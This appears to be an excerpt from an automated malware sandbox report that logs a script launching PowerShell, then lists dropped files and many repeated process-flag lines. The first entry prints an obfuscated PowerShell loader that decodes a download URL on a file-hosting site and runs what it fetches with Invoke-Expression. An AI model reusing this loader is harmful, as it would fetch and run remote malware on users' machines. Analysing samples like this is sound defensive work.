                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$FogJump to behavior
                Source: 31437F.exe.25.drStatic PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC3A0942 push E95B3BD0h; ret 8_2_00007FFAAC3A09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC3ACFE8 push esp; retf 8_2_00007FFAAC3ACFE9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC474DC9 push ebx; ret 8_2_00007FFAAC474F5A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08F23BF3 push es; iretd 11_2_08F23BF4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08F23B68 push eax; iretd 11_2_08F23B69
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_02F03BF3 push es; iretd 25_2_02F03BF4
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_02F03B68 push eax; iretd 25_2_02F03B69
                Source: C:\Windows\SysWOW64\dxdiag.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
